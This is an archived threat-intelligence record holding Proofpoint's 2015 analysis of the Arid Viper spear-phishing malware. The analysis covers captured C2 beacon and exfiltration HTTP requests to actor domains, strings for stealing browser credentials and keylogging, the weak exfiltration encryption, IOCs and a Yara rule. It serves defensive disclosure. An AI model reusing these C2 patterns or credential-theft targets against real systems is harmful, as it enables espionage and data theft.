{
	"id": "92e33255-1864-4fe2-8198-09f1d1d57da8",
	"created_at": "2026-04-06T00:13:49.693809Z",
	"updated_at": "2026-04-10T03:32:05.062112Z",
	"deleted_at": null,
	"sha1_hash": "efd5f7767010b9682d2ecaae6f2704e3914f1558",
	"title": "Operation Arid Viper Slithers Back into View | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 256667,
	"plain_text": "Operation Arid Viper Slithers Back into View | Proofpoint US\r\nBy September 18, 2015 Proofpoint Staff\r\nPublished: 2015-09-18 · Archived: 2026-04-02 11:31:59 UTC\r\nEarlier this year, researchers published analyses of targeted attack known as Operation Arid Viper [1] (aka Desert\r\nFalcons [2], aka DHS) directed primarily at organizations in the Middle East. Delivering a backdoor and spyware,\r\nthis campaign was designed to steal information from infected systems using a malware client capable of filtering\r\nout “uninteresting” files, and spread primarily via a targeted phishing email usually promising a pornographic\r\nvideo.\r\nThe infection chain described in the initial analyses was fairly straightforward: To access the video content, the\r\nrecipient had to open an attached RAR archive file – or less frequently, click a link to a RAR – that extracted an\r\nSCR (Windows screensaver) file, which in turn drops two files: a malicious EXE with the name of a legitimate\r\nfile (such as “skype.exe”), and a video format file, usually FLV or MPG.\r\nDespite the apparent severity and extent of this threat, little has been written about it in the intervening months,\r\nand the operation appeared to be dormant. However, Proofpoint researchers recently intercepted and analyzed\r\nphishing emails distributing Arid Viper malware payloads with some noteworthy updates.\r\nAs with the originally documented examples, these messages were part of narrow campaigns targeting specific\r\nindustry verticals: telecoms, high tech, and business services, primarily in Israel.\r\nIn these samples, the spear-phishing email contained a link to a RAR file hosted on MediaFire – no attachments\r\nwere observed. Instead of a pornographic video, the actors showed a change in TTP by using as lure a video of a\r\nfiery automobile accident.\r\naccident Road // התאונה בכביש\r\nתקשורת דלפ מזעזע וידיו // And his shocking leaked to the media\r\nClicking the linked RAR brings up a prompt to download the file “this.morning.rar” to their computer. (Fig. 1)\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 1 of 15\n\nFigure 1: Prompt to download RAR to local system\r\nThe file “this.morning” is a RAR self-extracting (SFX) archive (cd89897a2b6946a332354e0609c0b8b4). Once\r\ndownloaded, the user opens the RAR which extracts what appears to be a video file named “this.morning”.\r\nIn fact, double-clicking RAR SFX extracts and executes two files contained in this archive:\r\nA non-malicious video file: this.morning.flv (41bf348254b921bbd21350a70f843683)\r\nThe malware payload: chrome.exe (2ae0f580728c43b3a3888dfbe76ad689)\r\nIn this regard, the infection chain is still similar to that described in the original Operation Arid Viper analysis, but\r\nwith noticeable changes to the filenames and email lure, among others. The end user will see the promised video,\r\nwhile in the background the malicious “chrome.exe” begins is communication with the command and control (C2)\r\nserver: in both cases the action is automatic and initiated simply by double-clicking the self-extracting the RAR\r\nSFX archive, with no further interaction by the end-user needed. The following is an example of the initial C2\r\nbeacon: \r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 2 of 15\n\nGET /Sounds/sound_q.php?p=—[redacted]. HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: AudioDrive\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: oowdesign [.] com\r\nCache-Control: no-cache\r\nAnd this is an example of the C2 server response:\r\nHTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Wed, 26 Aug 2015 14:11:52 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nX-Powered-By: PHP/5.3.29\r\na\r\n.\r\nyes;\r\n0\r\nThe malware payload still uses the type of hard drive and a set of numbers as a unique identifier; for example:\r\nVMware-VMwareVirtualSSCSIDisk—[redacted].. Moreover, the malware compile time appears to be quite\r\nrecent. (Fig. 2)\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 3 of 15\n\nFigure 2: Malware file details showing compile date\r\nThe Trojan continues to exhibit its behavior of downloading an update following the first C2 communication, and\r\nin this case Proofpoint researchers succeeded in patching the initial malware to obtain the second stage malware\r\npayload (3a401a679d147b070eb8ccae5df3dc43), which allowed us to observe more activities.\r\nPreviously described as the Operation Arid Viper backdoor, the second stage payload was observed in traffic to be\r\nobfuscated with standard base64-encoding. The second-stage backdoor has a compile date prior to the first stage\r\nmalware by nearly a day. (Fig. 3)\r\nFigure 3: Malware file details showing compile date\r\nDuring the infection process, the Arid Viper malware makes multiple HTTP GET requests to register the client\r\nwith the server and check for updates:\r\nGET /designs/new_user.php?s1=[---UID---]\u0026s2=8 HTTP/1.1 àcall PHP script to login / register the infe\r\nGET /designs/is_ok.php?s1=[---UID---] HTTP/1.1 à call PHP script to perform a user check on the serve\r\nGET /designs/add_recoord.php?s1=[---UID---]\u0026s2=8\u0026s3=2[---Date---]\u0026s4=msn à call PHP script to add a\r\nGET /designs/get_t.php?s1=[---UID---]\u0026s2=[---Date---]\r\nGET /designs/add_t.php?s1=[---UID---]\u0026s2=[---Date---]\r\nGET /designs/get_r.php?s1=[---UID---]\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 4 of 15\n\nIn addition, the backdoor POSTs data back to the server:\r\nPOST /designs/drive_update.php HTTP/1.1 à encrypted data wrapped in a custom base64 encoding is sent\r\nUser-Agent: Realtek\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: smilydesign [.] com\r\nContent-Length: 978\r\nPragma: no-cache\r\nThe Arid Viper backdoor also sends GETs to confirm the existence of interesting data / files, with the path and\r\nfilenames included in the request. The following exchanges show the GET request (with filename and path in\r\nbold), and C2 server response (i.e., “OK”):\r\nGET /designs/send_request_r_data.php?s1=[redacted]\u0026path=C:/Users/COMPUTER/AppData/Roaming/Mozilla/Fi\r\nAccept: text/*\r\nUser-Agent: Realtek\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: smilydesign.com\r\nCache-Control: no-cache\r\nHTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Thu, 27 Aug 2015 11:48:19 GMT\r\nContent-Type: text/html\r\nContent-Length: 7\r\nConnection: keep-alive\r\nKeep-Alive: timeout=60\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 5 of 15\n\nX-Powered-By: PHP/5.3.10-1ubuntu3.17\r\nVary: Accept-Encoding\r\ndone\r\nGET /designs/send_request_r_data.php?s1=[redacted]\u0026path=C:/Users/COMPUTER/AppData/Roaming/Mozilla/Fi\r\nAccept: text/*\r\nUser-Agent: Realtek\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: smilydesign [.] com\r\nCache-Control: no-cache\r\nHTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Thu, 27 Aug 2015 11:48:19 GMT\r\nContent-Type: text/html\r\nContent-Length: 7\r\nConnection: keep-alive\r\nKeep-Alive: timeout=60\r\nX-Powered-By: PHP/5.3.10-1ubuntu3.17\r\nVary: Accept-Encoding\r\ndone\r\nIn addition, analysis of the Arid Viper backdoor binary shows evidence of keylogging capabilities:\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 6 of 15\n\n00000006E2C4 00000046F2C4 0 [The Right KeyPressed]\n00000006E2F4 00000046F2F4 0 [The LeFT Key Pressed]\n00000006E324 00000046F324 0 [The Down Key Is Pressed]\n00000006E358 00000046F358 0 [The Up Key Is Pressed]\n00000006E388 00000046F388 0 [left alt+shift]\n00000006E3AC 00000046F3AC 0 [right alt+shift]\n00000006E3D0 00000046F3D0 0 [Caps Lock]\n00000006E3E8 00000046F3E8 0 [Tab Pressed]\n00000006E404 00000046F404 0 [Back space Pressed...]\nAs well as the ability to steal browser data:\n00000006DC30 00000046EC30 0 \\logins.json\n00000006DC40 00000046EC40 0 \\key3.db\n00000006DC4C 00000046EC4C 0 \\Mozilla\\Firefox\\Profiles\\\n00000006DC68 00000046EC68 0 .default\n00000006DC74 00000046EC74 0 \\Mozilla\\Firefox\\Profiles\\*.*\n00000006DC94 00000046EC94 0 \\Google\\Chrome\\User Data\\Default\\Login Data\n00000006DCC0 00000046ECC0 0  00000006DCE9 00000046ECE9 0\nUsername: %ws\n00000006DCF8 00000046ECF8 0\nPassword: %ws\n00000006DD0C 00000046ED0C 0 Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\nPage 7 of 15\n\nThe Arid Viper backdoor encrypts data to be exfiltrated in order to avoid detection, and after additional analysis\r\nProofpoint researchers succeeded in determining its encryption routine.\r\nData Exfiltration\r\nThe updated data exfiltration of the new Arid Viper backdoor functions similarly to previously documented\r\nversions. The table below lists some of the different functionalities paired with the actor-assigned indicator, which\r\ncan be seen in both the HTTP client body along with exfiltrated data as well as in the URI once exfiltration is\r\ncomplete. (Table 1)\r\nExfiltration\r\ntype\r\nDescription\r\nmsn\r\nComputer name, user name, as well as Windows Live credentials (if found) are exfiltrated\r\nas plaintext data before encryption\r\ntree\r\nA “directory tree” of files and directories. This is stored compressed in a password-protected zip.\r\nlog\r\nA keylog containing a list of programs and keystrokes recorded in each program. This file\r\nis transmitted in a password-protected zip.\r\nrfile\r\nA password-protected zip containing the exfiltrated file named as file.dll as well as a text\r\nfile (name.txt) containing the original full path and name of the exfiltrated file.\r\nimg\r\nScreenshots are taken every ~5 minutes in the initial function. Several screenshots are then\r\ncompressed into a password-protected zip file\r\nTable 1: Arid Viper exfiltration types and descriptions\r\nCaptured C2 traffic provides an example of the network traffic seen during a msn data exfiltration. (Fig. 4)\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 8 of 15\n\nFigure 4: Example network traffic during data exfiltration\r\nAlthough the data that is exfiltrated and the manner in which it is gathered remain largely the same as in\r\npreviously documented versions, the final result that is transmitted to an attacker-controlled server has changed\r\nsignificantly. In an older version of this backdoor (md5: aefea9d795624da16d878dc9bb81bf87), exfiltrated data\r\nwas simply base64-encoded using a slightly modified base64 alphabet (“-” instead of “+”). In the newer version,\r\nprior to base64 encoding the exfiltrated data is first encrypted with AES-256 in CBC mode. The encryption\r\nprocess is depicted in Figure 5 and explained below.\r\nFigure 5: Arid Viper encryption process for data exfiltration\r\nTo generate the key/IV pair, first the malware randomly generates 60 bytes of data. From this, the first 32-bytes\r\nare used for the key, the next byte is skipped, and the following 16 bytes are used for the IV. After encryption, the\r\nkey, separator byte, IV, leftover bytes and padding are then encoded into a 512-byte block of data and prepended\r\nto the encrypted data. The encoded key/IV and encrypted data are then base64-encoded using the same modified\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 9 of 15\n\nalphabet. Just like in the older version, this data is then appended to the final variable in the POST’s HTTP client\r\nbody and sent to an attacker-controlled server.\r\nReinventing the wheel\r\nNumerous examples over the years have served to remind us that designing your own cryptography\r\nimplementation is difficult and usually ill-advised. The authors of the updated Arid Viper backdoor seem to have\r\noverlooked this lesson for, although certain measures have been taken to protect the generated secret keys and IVs,\r\ntheir implementation is susceptible to a brute force attack, often capable of finding the correct key/IV combination\r\nin less than one second. Cracking the encryption scheme applied to the traffic in Figure 4 reveals the following\r\ndecrypted cleartext. (Fig. 6)\r\nFigure 6: Decrypted data from example network traffic in Figure 4\r\nDetermining the encryption scheme that is applied to the updated Arid Viper backdoor’s exfiltrated data enables us\r\nto better detect C2 communication while also rapidly determining the extent and impact of the data breach carried\r\nout by the malware client.\r\nConclusion\r\nIn summary, this update to Operation Arid Viper demonstrates that despite its relatively low profile since February\r\nthe Arid Viper / Desert Falcons threat still has teeth and remains a risk for organizations in Israel and elsewhere.\r\nWhile the overall attack profile observed in recent examples remains similar to the originally documented\r\ncampaigns, the recent campaigns exhibit several important updates: \r\nUse of links instead of attachments\r\nNew lures: still using pornographic video but most recent detections also included lures for auto accident\r\nfootage\r\nNew executable name: originally reported using “skype.exe” (and variations on “skype”), the recent\r\nsamples used “chrome.exe”\r\nNew C2 domains\r\nAdded encryption for exfiltrated data\r\nThe return of Operation Arid Viper shows that targeted attacks can remain a threat even – and especially – when\r\nthey are no longer in the headlines, \r\nReferences\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 10 of 15\n\n[1] http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-arid-viper.pdf\r\n[2] https://securelist.com/blog/research/68817/the-desert-falcons-targeted-attacks/\r\nIndicators of Compromise (IOCs)\r\nObserved C2 domains and IP addresses:\r\nsmilydesign [.] com / 195.154.252.2\r\nyalladesign [.] net / 173.236.89.19\r\noowdesign [.] com / 195.154.133.228\r\ncoldydesign [.] com / 195.154.252.2\r\nAttachment and payload hashes for this sample:\r\nthis.morning.rar - cd89897a2b6946a332354e0609c0b8b4\r\nthis.morning.exe - 2ae0f580728c43b3a3888dfbe76ad689\r\nRtlUpd.exe - 3a401a679d147b070eb8ccae5df3dc43\r\nAttachment and payload hashes for all campaigns observed since July 1:\r\n8dc2cef74f9e577b431ad3569c894dc07c8c429ef04235936587ac0e70e2993c\r\nd3c184840805a280895387bf321a15a3dfc6af28314983c535e332cbcee7faf0\r\n9cd995095d351b31512fc8866f21bc90624306408a6552879a7dc9317848d877\r\ne6e65932473a14d2d104c11234a391fc68c6874f06054a7a019facf5da9498a8\r\nf05e913be22eebb19143886b75ca59842d9ce6cf355c23375aa80fdbccad3ec0\r\n343674e2b89e6e786ba08718e0672f3ff21a826c6a4e6e4f41dbd5af3157031d\r\nc21891edf9a88953fe49c2aa24ed51e093004a865269ac88a5f3fc149762bd2b\r\n658f63baa9dd4fcc031114ea579e3423d19cb81128a5c577cc5ad10c669b950f\r\n1710997941193e52e6251638cf80e8ea6a520624f5ebe4583f974252cb8d4881\r\n94f0f5f4849632fd68cce11f6247bb90e426842aa8aee8974f5b0abea2a85748\r\n16c687fdb35ec21482b5b07aee274fdc4fc8c5c0928cb5de441c5b3e84ba98ad\r\nff73aa398636a01595d4762a925e1e1b976f85306663c22e7200db74c093f27e\r\n56a3ee282a25fbb234651fe3771574056576aa68e25e05587c5a443ddd0f59fc\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 11 of 15\n\nd7de32c9ab9265d1dd900688c91d3468e05f88f98bd67bbd883450db44df045e\r\n39fc67689c28a31183a7e1d499e8a4bfeb06fc629cf567c1b6c245edb6564d16\r\n1f3b4ceea2e3054162260bb827a5c867d5615b15c68e065d97a99a892d5cad4e\r\n109d248b9dabb019e4d2d82552c63d84ab14e931af40c6f3a09a3df3a40212f2\r\n03eff13ea629acfff6416d95f674195b4fbaa158914e8f9d5ac1f5e094a60fae\r\nFiles and paths indicating infection:\r\nC:\\Program Files\\Realtek\\AudRT.dll\r\nC:\\Program Files\\Realtek\\AudRTx32.dll\r\nC:\\Program Files\\Realtek\\AudRTx86.dll\r\nC:\\Program Files\\Realtek\\cn.dll\r\nC:\\Program Files\\Realtek\\ffmencrypt_secret.key\r\nC:\\Program Files\\Realtek\\ffmUntitled\r\nC:\\Program Files\\Realtek\\ffsk\r\nC:\\Program Files\\Realtek\\ffsk1\r\nC:\\Program Files\\Realtek\\files\r\nC:\\Program Files\\Realtek\\flfiles\r\nC:\\Program Files\\Realtek\\fmencrypt_secret.key\r\nC:\\Program Files\\Realtek\\fmUntitled\r\nC:\\Program Files\\Realtek\\fsk\r\nC:\\Program Files\\Realtek\\fsk1\r\nC:\\Program Files\\Realtek\\gfile\r\nC:\\Program Files\\Realtek\\gmencrypt_secret.key\r\nC:\\Program Files\\Realtek\\gmUntitled\r\nC:\\Program Files\\Realtek\\gsk\r\nC:\\Program Files\\Realtek\\gsk1\r\nC:\\Program Files\\Realtek\\IM.dll\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 12 of 15\n\nC:\\Program Files\\Realtek\\imencrypt_secret.key\r\nC:\\Program Files\\Realtek\\ImRt.dll\r\nC:\\Program Files\\Realtek\\ImRtx86.dll\r\nC:\\Program Files\\Realtek\\imUntitled\r\nC:\\Program Files\\Realtek\\isk\r\nC:\\Program Files\\Realtek\\isk1\r\nC:\\Program Files\\Realtek\\lmencrypt_secret.key\r\nC:\\Program Files\\Realtek\\lmUntitled\r\nC:\\Program Files\\Realtek\\lsk\r\nC:\\Program Files\\Realtek\\lsk1\r\nC:\\Program Files\\Realtek\\mmencrypt_secret.key\r\nC:\\Program Files\\Realtek\\mmUntitled\r\nC:\\Program Files\\Realtek\\msk\r\nC:\\Program Files\\Realtek\\msk1\r\nC:\\Program Files\\Realtek\\Realtek.dll\r\nC:\\Program Files\\Realtek\\rfiles\r\nC:\\Program Files\\Realtek\\rfmencrypt_secret.key\r\nC:\\Program Files\\Realtek\\rfmUntitled\r\nC:\\Program Files\\Realtek\\rfsk\r\nC:\\Program Files\\Realtek\\rfsk1\r\nC:\\Program Files\\Realtek\\RRTM.dll\r\nC:\\Program Files\\Realtek\\RRTM.dllm\r\nC:\\Program Files\\Realtek\\Rt.inf\r\nC:\\Program Files\\Realtek\\Rtd.ini\r\nC:\\Program Files\\Realtek\\Rtf.dll\r\nC:\\Program Files\\Realtek\\Rtf32.dll\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 13 of 15\n\nC:\\Program Files\\Realtek\\Rtf64.dll\r\nC:\\Program Files\\Realtek\\Rtg.dll\r\nC:\\Program Files\\Realtek\\Rtgx32.dll\r\nC:\\Program Files\\Realtek\\Rtgx64.dll\r\nC:\\Program Files\\Realtek\\Rtled.tmp\r\nC:\\Program Files\\Realtek\\Rtlupd.conf\r\nC:\\Program Files\\Realtek\\RTlx32.dll\r\nC:\\Program Files\\Realtek\\RTlx64.dll\r\nC:\\Program Files\\Realtek\\RTlx86.dll\r\nC:\\Program Files\\Realtek\\RTM.dll\r\nC:\\Program Files\\Realtek\\Rtrfl\r\nC:\\Program Files\\Realtek\\Rttr.dlt\r\nC:\\Program Files\\Realtek\\Rttr.zip\r\nC:\\Program Files\\Realtek\\tmencrypt_secret.key\r\nC:\\Program Files\\Realtek\\tmUntitled\r\nC:\\Program Files\\Realtek\\tsk1\r\nC:\\Program Files\\Realtek0.txt\r\nC:\\Program Files\\Realtek\\REF\\OK\r\nDetection\r\nThe following Yara rule can detect the updated Arid Viper backdoor traffic:\r\nrule AVIDVIPER_APT_BACKDOOR {\r\n    meta:\r\n        author = \"Proofpoint Staff\"\r\n        info = \"avid viper update\"\r\n        strings:\r\n        $s1 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/\"\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 14 of 15\n\n$s2 = \"SELECT * FROM Win32_DiskDrive\" wide ascii\r\n                $s3 = \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" wide ascii\r\n                $s4 = \"\\\\dd\\\\vctools\\\\vc7libs\\\\ship\\\\atlmfc\" wide ascii\r\n        condition:\r\n                $s4 and 2 of ($s1,$s2,$s3)\r\n}\r\nIn addition, Proofpoint Emerging Threats (ET) has a variety of signatures for detecting older and updated versions\r\nof Arid Viper and Desert Falcons.\r\nArid Viper:\r\nET Open signatures: 2020431-2020454\r\nET Pro signatures: 2812701, 2812729\r\nDesert Falcon:\r\nET Open: 2020459, 2020461, 2020462, 2020464-2020469, 2020472\r\nSource: https://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View"
	],
	"report_names": [
		"Operation-Arid-Viper-Slithers-Back-Into-View"
	],
	"threat_actors": [
		{
			"id": "9ff60d4d-153b-4ed5-a2f7-18a21d2fa05d",
			"created_at": "2022-10-25T16:07:23.539852Z",
			"updated_at": "2026-04-10T02:00:04.647734Z",
			"deleted_at": null,
			"main_name": "Desert Falcons",
			"aliases": [
				"APT-C-23",
				"ATK 66",
				"Arid Viper",
				"Niobium",
				"Operation Arid Viper",
				"Operation Bearded Barbie",
				"Operation Rebound",
				"Pinstripe Lightning",
				"Renegade Jackal",
				"TAG-63",
				"TAG-CT1",
				"Two-tailed Scorpion"
			],
			"source_name": "ETDA:Desert Falcons",
			"tools": [
				"AridSpy",
				"Barb(ie) Downloader",
				"BarbWire",
				"Desert Scorpion",
				"FrozenCell",
				"GlanceLove",
				"GnatSpy",
				"KasperAgent",
				"Micropsia",
				"PyMICROPSIA",
				"SpyC23",
				"Viper RAT",
				"ViperRAT",
				"VolatileVenom",
				"WinkChat",
				"android.micropsia"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b1979c55-037a-415f-b0a3-cab7933f5cd4",
			"created_at": "2024-04-24T02:00:49.561432Z",
			"updated_at": "2026-04-10T02:00:05.416794Z",
			"deleted_at": null,
			"main_name": "APT-C-23",
			"aliases": [
				"APT-C-23",
				"Arid Viper",
				"Desert Falcon",
				"TAG-63",
				"Grey Karkadann",
				"Big Bang APT",
				"Two-tailed Scorpion"
			],
			"source_name": "MITRE:APT-C-23",
			"tools": [
				"Micropsia"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "929d794b-0e1d-4d10-93a6-29408a527cc2",
			"created_at": "2023-01-06T13:46:38.70844Z",
			"updated_at": "2026-04-10T02:00:03.075002Z",
			"deleted_at": null,
			"main_name": "AridViper",
			"aliases": [
				"Desert Falcon",
				"Arid Viper",
				"APT-C-23",
				"Bearded Barbie",
				"Two-tailed Scorpion"
			],
			"source_name": "MISPGALAXY:AridViper",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e5cad6bf-fa91-4128-ba0d-2bf3ff3c6c6b",
			"created_at": "2025-08-07T02:03:24.53077Z",
			"updated_at": "2026-04-10T02:00:03.680525Z",
			"deleted_at": null,
			"main_name": "ALUMINUM SARATOGA",
			"aliases": [
				"APT-C-23",
				"Arid Viper",
				"Desert Falcon",
				"Extreme Jackal ",
				"Gaza Cybergang",
				"Molerats ",
				"Operation DustySky ",
				"TA402"
			],
			"source_name": "Secureworks:ALUMINUM SARATOGA",
			"tools": [
				"BlackShades",
				"BrittleBush",
				"DarkComet",
				"LastConn",
				"Micropsia",
				"NimbleMamba",
				"PoisonIvy",
				"QuasarRAT",
				"XtremeRat"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "35b3e533-7483-4f07-894e-2bb3ac855207",
			"created_at": "2025-08-07T02:03:24.540035Z",
			"updated_at": "2026-04-10T02:00:03.69627Z",
			"deleted_at": null,
			"main_name": "ALUMINUM SHADYSIDE",
			"aliases": [
				"APT-C-23 ",
				"Arid Viper ",
				"Desert Falcon "
			],
			"source_name": "Secureworks:ALUMINUM SHADYSIDE",
			"tools": [
				"Micropsia",
				"SpyC23"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434429,
	"ts_updated_at": 1775791925,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/efd5f7767010b9682d2ecaae6f2704e3914f1558.pdf",
		"text": "https://archive.orkl.eu/efd5f7767010b9682d2ecaae6f2704e3914f1558.txt",
		"img": "https://archive.orkl.eu/efd5f7767010b9682d2ecaae6f2704e3914f1558.jpg"
	}
}